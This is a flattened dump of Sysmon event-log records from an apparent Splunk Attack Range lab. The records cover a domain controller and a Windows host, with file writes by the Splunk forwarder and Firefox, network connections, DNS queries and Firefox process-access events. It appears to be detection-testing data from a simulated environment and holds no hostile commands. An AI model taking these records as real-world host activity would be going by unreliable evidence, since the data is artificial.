Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854138DFB90332AD7936A72176ABC441,SHA256=3DC45362909AEAAA40CB9AD4EB0FCAF365E1A273BBB1D53AD18BFBAB78C5AC87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.165{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BF659222ADEAE1002F209EFC8F25FD,SHA256=5526C89B7A3A4FF51C6AF0CF8EEC42149C83F242FD666BF9CB3828D175441427,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:47.739{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61953-false10.0.1.12-8000- 23542300x8000000000000000810230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:57.914{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A7872C99A5480F8AE74A7ADC135D730,SHA256=C0F9A498B7F859C89B343D0311126A8D3FF740920C65E9348F1BFE78ADA865C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.466{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.334{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3220C5A943C16C39F832679ECFCBD44B,SHA256=E2BB3B9107F9FDE799F2338F1A4F81164BC02CF81ADF5A3BDD0FBE4FDE06673F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.042{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61954-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001054369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.042{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61954-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000810231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:58.930{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A44A28A08DEAFB9D489C40BEC2848743,SHA256=0F53512550AB6AB0F65E102A452640D21B1F30B1C9F0AF313662C6E02C4CBBF4,IMPHASH=00000000000000000000000000000000falsetrue 
22542200x80000000000000001054382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.988{466BC892-3462-60E8-100C-00000000CF01}8944d2nxq2uap88usk.cloudfront.net02600:9000:2156:5600:a:da5e:7900:93a1;2600:9000:2156:6c00:a:da5e:7900:93a1;2600:9000:2156:ec00:a:da5e:7900:93a1;2600:9000:2156:1a00:a:da5e:7900:93a1;2600:9000:2156:d400:a:da5e:7900:93a1;2600:9000:2156:b400:a:da5e:7900:93a1;2600:9000:2156:ee00:a:da5e:7900:93a1;2600:9000:2156:ac00:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001054381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.986{466BC892-3462-60E8-100C-00000000CF01}8944d2nxq2uap88usk.cloudfront.net013.32.25.96;13.32.25.81;13.32.25.69;13.32.25.34;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\broadcast-listeners.jsonMD5=E31DDAC0F78D87A5E4FA70F31042EDF1,SHA256=4F65E04348C667AABB7FA1085CF8A78D4D8DDAB4F4E50F166A79CE65C9CBC630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.250{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf76c34c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:58.212{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8FAA46AD43BF45CFAD1634A8CC73E8,SHA256=516F8BC22E1AE6B2901922BC11A0C3F03AF5EAD14927C2DF683D30EC0E044E47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.525{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61956-false13.32.25.34server-13-32-25-34.fra56.r.cloudfront.net443https 354300x80000000000000001054376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.524{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55703- 354300x80000000000000001054375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.470{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61955-false13.224.193.99server-13-224-193-99.fra2.r.cloudfront.net443https 354300x80000000000000001054374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.466{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63326- 23542300x8000000000000000810232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:59.930{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDF3E5B4C4F6D17E9E74AD2D8245B877,SHA256=3DDB38F9B8D137B520E6301133D6D121366D3B93205A1A87FBCC2EF00AD83FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:59.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5867DD88137FB8C3F3211699AB6C4DCD,SHA256=8F839242CC4770FA6FC5C7D5A2E703B25B3B29F1D47AC43D29CF9F0FEE966C07,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.841{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61957-false10.0.1.12-8089- 23542300x8000000000000000810233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:00.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AFA170CD541703DB3D2D4B32324BC52,SHA256=1D8686C1F0723F74DF886816C9FFB6ED0553DED93D058972BAB630E5A513D49C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001054389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001054388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001054387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001054386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf76cd10.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.264{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718B04DE6DA187135572E1365C51B041,SHA256=E7D2BE219462ABC65D4F6A44CD9955610F7DA54A30AB47B6188C9E2BC14FB271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:01.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50743BFC63DF933BF93135DAD479424,SHA256=893B253AA9990F5DD23603C89E85F60DD284286ECE17DD4D7AB51A4641A3F87C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:00.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57453-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:01.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B79A30FE3962475F2E191F463805062,SHA256=B70323EAE2DFB6D73A1273931A63D1E14C07DE83F62F0602450C7E3B446C7A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:02.976{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E65A72D8D6B5359E101A49A258B6FF7,SHA256=DD0C2E4D71B8D55D663FAD8A65B3CB0E6FBEA07B40E4FBC46BF0F0E5C99CA68A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61958-false10.0.1.12-8000- 23542300x80000000000000001054392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:02.295{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE01B459E2F637578ADCD59F2CFBA6B,SHA256=A371BFF7660988D0CF59128C944B27EA3A1F122230104D05F3AA5F05FE5F3991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:03.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B56E4F02D13022529F6A2A70C23BF20,SHA256=107B33A6BE0E602AD299B250A6440292B94706C68C01A3BA9B545E9E18E13589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:03.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD5F7402FD7C0AD3F3A3BF9D4ABA0EA,SHA256=AE137110F70D9615CE9F169999D9FD06F77D1F4833B65370176EA8730993D87F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:04.327{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82F2B18A57C60D51F84BD738F27B842,SHA256=7660D4FEC689D0405BC3C83E84683D9AA5CB28568FA8B66ACB50E71A697ED3B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:05.330{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C07E81D87618B3CAE2EE6FFD460C4AF,SHA256=EB1C8BC589432CD84CE2226612A1857E49B7CCF8FCAF7C34116D4E2EA3A502D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:05.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6530DAC6E5E0B0E3F9FDD6A16217264D,SHA256=140E05CDC250CA2D09B5F2DE3BB9852602B4521C70C388EA0EC0CA9B70A60C0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:06.026{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A2F2F7763CBD0CEDDCAFFBA81C0BA2,SHA256=7AD8D635D1289566E1C41673D3B840D595E7A5008E5C10DA0E9F03943D353BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.499{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program 
Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1217.144631910C:\Program Files\Mozilla Firefox\firefox.exe 
